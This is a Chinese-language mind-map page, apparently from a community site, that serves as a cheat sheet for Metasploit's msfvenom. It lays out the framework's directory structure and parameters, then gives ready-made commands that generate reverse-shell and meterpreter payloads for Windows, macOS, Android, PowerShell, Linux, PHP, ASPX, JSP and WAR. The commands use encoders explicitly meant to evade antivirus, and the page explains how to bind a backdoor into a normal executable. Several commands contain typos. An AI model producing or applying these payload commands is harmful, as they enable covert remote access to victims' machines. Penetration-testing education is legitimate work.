导图社区 Msfvenom
msfvenom -a x86 --platform Windows -p windows/powershell_reverse_tcp LHOST=x.x.x.x LPORT=2333 -e cmd/powershell_base64 -i 3 -f raw -o shell.ps1 nc正向 msfvenom -p wind...
后渗透之meterpretermeterpreter常用命令1.基本命令2.文件系统命令3.网络命令4.键盘监听5.系统命令6.mimikatz7.网络嗅探8.获取敏感信息9.获取 Hash10.通过 Hash 获..
meterpreter是metasploit中的一个杀手锏,通常在漏洞利用成功后,会返回给攻击者一个攻击通道,其中有很多自动化操作 首先,我们使用metasploit中的另一个后门工具msfvenom生成一个木马...
第一步:终端启动MSFCONSOLE 以管理员身份运行 sudo msfconsole 出现msf提示符了,就登录成功了 第二步:寻找模块 使用search加上自己想找的模块(相当于模糊查询) 使用search命令搜索所有有效的Linux模块 search linux
社区模板帮助中心,点此进入>>
英文雅思大作文的命题类型和写作框架总结!
G类小作文书信写法
六级高频单词
英语学习:P的逻辑
英语学习p字母相关的单词
医学相关的英语词汇
系动词be的语法
48个国际音标标准学习
topic
雅思听力临考前策略
MSF
目录结构
msf 目录:/usr/share/metasploit-framework/
modules:目录里面存放渗透使用的 辅助模块 编码模块 利用模块 攻击载荷 后渗透模块
auxiliary:辅助模块,辅助渗透(端口扫描、登录密码、漏洞验证等)
encoders:编码器模块,主要包含各种编码工具,对 payload 进行编码加密,以便绕过入侵检测和过滤系统
evasion:逃避模块,用来生成免杀 payload
exploits:漏洞利用模块,包含主流的漏洞利用脚本,通常是对某些可能存在漏洞的目标进行漏洞利用
nops:这里主要放着调整 shellcode 前置 nop 指令长度的工具(不理解没关系)
payloads:攻击载荷,主要是攻击成功后在目标机器执行的代码,比如反弹shell的代码
post:后渗透模块,漏洞利用成功获得 meterpreter 之后,向目标发送的一些功能性指令,如:提权等
plugins:这个模块需要用 load 加载,主要提供数据库连接插件 和 各种要用到的插件
tools:包含一些有用的脚本和零散的工具
scripts:目录里面存放都是 meterpreter 利用的脚本
db:数据放在这个目录里
data:存放使用到的文件,比如密码字典、meterpreter、passivex、vnc、dlls等工具和一些用户接口代码,msfweb 和一些其他模块用到的数据文件
lib:库文件都保存在这个目录里
msfvenom 常用参数
-l:列出指定模块的所有可用资源,模块类型包括:payloads,encoders,nops,all
-a:指定 payload 的目标架构
选择架构平台:x86 | x64 | x86_64
--Platform:windows, netware, android, java, ruby, linux, cisco, solaris, osx, bsd, openbsd, bsdi, netbsd, freebsd, aix, hpux, irix, unix, php, javascript, python, nodejs, firefox, mainframe
-p:指定需要使用的 payload (攻击荷载)
-e:指定需要使用的encoder(编码器)编码免杀
-b:设定规避字符集,比如: '\x00\xff'避免使用的字符
-i:指定 payload 的编码次数
-f:指定输出格式
Executable formats:Asp、aspx、aspx-exe、axis2、dll、elf、elf-so、exe、exe-only、exe-service、exe-smallhta-psh、jar、jsp、loop-vbs、macho、msi、msi-nouac、osx-app、psh、psh-cmd、psh-net、psh-reflection、python-reflection、vba、vba-exe、vba-psh、vbs、war; Transform formats:base32、base64、bash、c、csharp、dw、dword、hex、java、js_be、js_le、num、perl、pl、powershell、ps1、py、python、raw、rb、ruby、sh、vbapplication、vbscript;
-o:保存 payload 文件输出
-n:为 payload 预先指定一个 NOP 滑动长度
-s:设定有效攻击荷载的最大长度生成 payload 的最大长度,就是文件大小
-c:指定一个附加的win32 shellcode 文件
-x:指定一个自定义的可执行文件作为模板
例:原先有个正常文件 normal.exe 可以通过这个选项把后门捆绑到这个程序上面
-k:保护模板程序的动作,注入的 payload 作为一个新的进程运行
-v:指定一个自定义的变量,以确定输出格式
各平台生成 payload 命令
windows
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1.138 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 10 -f exe -o payload.exe
Mac
msfvenom -a x86 --platform osx -p osx/x86/shell_reverse_tcp LHOST=192.168.1.138 LPORT=4444 -f macho -o payload.macho
Android
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.138 LPORT4567 -o payload.apk
Powershell
msfvenom -a x86 --platform windows -p windows/powershell_reverse_tcp LHOST=192.168.1.138 LPORT=8888 -e cmd/pwershell_base64 -i3 -f raw -o payload.ps1
Linux
msfvenom -a x86 --platform Linux -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.138 LPORT=4567 -f elf -o payload.elf
php
msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.1.1 LPORT=8888 -f raw > shell.php
aspx
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=8888 -f aspx -o payload.aspx
JSP
msfvenom --platform java -p java/jsp_shell_reverse_tcp LHOST=192.168.1.1 LPORT=4567 -f raw -o payload.jsp
war
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.1 LPORT=4567 -f raw - o payload.war